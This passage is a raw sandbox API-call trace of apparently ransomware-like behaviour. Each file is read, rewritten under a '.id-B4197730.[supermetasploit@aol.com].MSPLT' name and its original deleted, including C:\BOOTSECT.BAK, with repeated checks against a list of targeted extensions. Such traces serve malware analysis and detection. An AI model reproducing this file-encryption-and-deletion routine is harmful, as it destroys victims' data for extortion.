(hObject=0x2f4) returned 1 [0172.772] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.857] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".doc") returned 4 [0172.858] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".docx") returned 5 [0172.858] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0172.858] lstrlenW (lpString=".pdf") returned 4 [0172.858] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".xls") returned 4 [0172.858] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".xlsx") returned 5 [0172.858] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0172.858] lstrlenW (lpString=".ppt") returned 4 [0172.858] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".zip") returned 4 [0172.858] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".rar") returned 4 [0172.858] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".bz2") returned 4 [0172.858] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0172.858] lstrlenW (lpString=".7z") returned 3 [0172.858] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".dbf") returned 4 [0172.858] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".1cd") returned 4 [0172.858] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".jpg") returned 4 [0172.858] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.858] lstrlenW (lpString=".doc") returned 4 [0172.858] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".docx") returned 5 [0172.859] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0172.859] lstrlenW (lpString=".pdf") returned 4 [0172.859] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".xls") returned 4 [0172.859] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".xlsx") returned 5 [0172.859] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0172.859] lstrlenW (lpString=".ppt") returned 4 [0172.859] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0172.859] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.859] lstrlenW (lpString=".zip") returned 4 [0172.859] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".rar") returned 4 [0172.859] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".bz2") returned 4 [0172.859] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0172.859] lstrlenW (lpString=".7z") returned 3 [0172.859] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0172.859] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.859] lstrlenW (lpString=".dbf") returned 4 [0172.859] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0172.859] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.859] lstrlenW (lpString=".1cd") returned 4 [0172.859] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0172.859] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0172.859] lstrlenW (lpString=".jpg") returned 4 [0172.859] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0172.859] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.859] lstrlenW (lpString="UiInfo.xml") returned 10 [0172.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0172.860] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=39050) returned 1 [0172.860] CloseHandle (hObject=0x358) returned 1 [0172.860] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 0x80 [0172.860] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0172.860] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.860] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.860] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.866] GetLastError () returned 0x0 [0172.866] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x988a, lpOverlapped=0x0) returned 1 [0172.890] WriteFile (in: hFile=0x384, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x9890, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x9890, lpOverlapped=0x0) returned 1 [0172.892] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0172.892] WriteFile (in: hFile=0x384, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe8, lpOverlapped=0x0) returned 1 [0172.892] SetEndOfFile (hFile=0x384) returned 1 [0172.892] CloseHandle (hObject=0x384) returned 1 [0172.894] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.894] SetEndOfFile (hFile=0x358) returned 1 [0172.895] CloseHandle (hObject=0x358) returned 1 [0172.895] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.895] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 1 [0172.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.896] lstrlenW (lpString=".doc") returned 4 [0172.896] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString=".docx") returned 5 [0172.896] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.896] lstrlenW (lpString=".pdf") returned 4 [0172.896] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString=".xls") returned 4 [0172.896] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString=".xlsx") returned 5 [0172.896] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.896] lstrlenW (lpString=".ppt") returned 4 [0172.896] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.896] lstrlenW (lpString=".zip") returned 4 [0172.896] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.896] lstrlenW (lpString=".rar") returned 4 [0172.896] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString=".bz2") returned 4 [0172.896] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.896] lstrlenW (lpString=".7z") returned 3 [0172.896] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".dbf") returned 4 [0172.897] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".1cd") returned 4 [0172.897] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".jpg") returned 4 [0172.897] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".doc") returned 4 [0172.897] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString=".docx") returned 5 [0172.897] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0172.897] lstrlenW (lpString=".pdf") returned 4 [0172.897] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString=".xls") returned 4 [0172.897] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString=".xlsx") returned 5 [0172.897] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0172.897] lstrlenW (lpString=".ppt") returned 4 [0172.897] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".zip") returned 4 [0172.897] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.897] lstrlenW (lpString=".rar") returned 4 [0172.897] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString=".bz2") returned 4 [0172.897] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.897] lstrlenW (lpString=".7z") returned 3 [0172.897] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.897] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.897] lstrlenW (lpString=".dbf") returned 4 [0172.898] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.898] lstrlenW (lpString=".1cd") returned 4 [0172.898] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.898] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 41 [0172.898] lstrlenW (lpString=".jpg") returned 4 [0172.898] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.898] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.898] lstrlenW (lpString="ParameterInfo.xml") returned 17 [0172.898] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.901] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=272046) returned 1 [0172.901] CloseHandle (hObject=0x384) returned 1 [0172.901] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 0x80 [0172.901] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.901] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.901] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.901] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.901] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0172.902] GetLastError () returned 0x0 [0172.902] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x426ae, lpOverlapped=0x0) returned 1 [0172.943] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x426b0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x426b0, lpOverlapped=0x0) returned 1 [0173.145] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0173.145] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0173.145] SetEndOfFile (hFile=0x374) returned 1 [0173.145] CloseHandle (hObject=0x374) returned 1 [0173.153] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.153] SetEndOfFile (hFile=0x384) returned 1 [0173.157] CloseHandle (hObject=0x384) returned 1 [0173.157] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.157] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 1 [0173.158] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.158] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.158] lstrlenW (lpString=".doc") returned 4 [0173.158] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString=".docx") returned 5 [0173.158] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0173.158] lstrlenW (lpString=".pdf") returned 4 [0173.158] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString=".xls") returned 4 [0173.158] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString=".xlsx") returned 5 [0173.158] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0173.158] lstrlenW (lpString=".ppt") returned 4 [0173.158] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.158] lstrlenW (lpString=".zip") returned 4 [0173.158] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.158] lstrlenW (lpString=".rar") returned 4 [0173.158] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString=".bz2") returned 4 [0173.158] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString=".7z") returned 3 [0173.158] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.158] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.158] lstrlenW (lpString=".dbf") returned 4 [0173.158] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.158] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.159] lstrlenW (lpString=".1cd") returned 4 [0173.159] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.159] lstrlenW (lpString=".jpg") returned 4 [0173.159] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.159] lstrlenW (lpString=".doc") returned 4 [0173.159] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString=".docx") returned 5 [0173.159] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0173.159] lstrlenW (lpString=".pdf") returned 4 [0173.159] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString=".xls") returned 4 [0173.159] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString=".xlsx") returned 5 [0173.159] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0173.159] lstrlenW (lpString=".ppt") returned 4 [0173.159] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.159] lstrlenW (lpString=".zip") returned 4 [0173.159] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0173.159] lstrlenW (lpString=".rar") returned 4 [0173.159] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString=".bz2") returned 4 [0173.159] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0173.159] lstrlenW (lpString=".7z") returned 3 [0173.160] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0173.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.160] lstrlenW (lpString=".dbf") returned 4 [0173.160] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0173.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.160] lstrlenW (lpString=".1cd") returned 4 [0173.160] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0173.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0173.160] lstrlenW (lpString=".jpg") returned 4 [0173.160] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0173.160] lstrcmpiW (lpString1=".BAK", lpString2=".MSPLT") returned -1 [0173.160] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0173.160] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0173.161] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=8192) returned 1 [0173.161] CloseHandle (hObject=0x384) returned 1 [0173.161] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0173.161] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\bootsect.bak.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.161] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0173.161] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0173.161] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.161] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.162] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\bootsect.bak.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0173.165] GetLastError () returned 0x0 [0173.165] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x2000, lpOverlapped=0x0) returned 1 [0173.284] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x2010, lpOverlapped=0x0) returned 1 [0173.286] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0173.286] WriteFile (in: hFile=0x374, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0173.286] SetEndOfFile (hFile=0x374) returned 1 [0173.286] CloseHandle (hObject=0x374) returned 1 [0173.288] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0173.288] SetEndOfFile (hFile=0x384) returned 1 [0173.289] CloseHandle (hObject=0x384) returned 1 [0173.289] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x27) returned 1 [0173.289] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0173.290] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.290] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.290] lstrlenW (lpString=".doc") returned 4 [0173.290] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".docx") returned 5 [0173.290] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0173.290] lstrlenW (lpString=".pdf") returned 4 [0173.290] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".xls") returned 4 [0173.290] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".xlsx") returned 5 [0173.290] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0173.290] lstrlenW (lpString=".ppt") returned 4 [0173.290] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.290] lstrlenW (lpString=".zip") returned 4 [0173.290] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".rar") returned 4 [0173.290] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".bz2") returned 4 [0173.290] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString=".7z") returned 3 [0173.290] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0173.290] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.290] lstrlenW (lpString=".dbf") returned 4 [0173.290] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0173.290] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.291] lstrlenW (lpString=".1cd") returned 4 [0173.291] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0173.291] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.291] lstrlenW (lpString=".jpg") returned 4 [0173.291] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.291] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0173.291] lstrlenW (lpString=".doc") returned 4 [0173.291] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".docx") returned 5 [0173.291] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0173.291] lstrlenW (lpString=".pdf") returned 4 [0173.291] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".xls") returned 4 [0173.291] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0173.291] lstrlenW (lpString=".xlsx") returned 5 [0173.291] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0173.291] lstrlenW (lpString=".ppt") returned 4 [0173.291] lstrcmpiW (lpString1=".ppt", 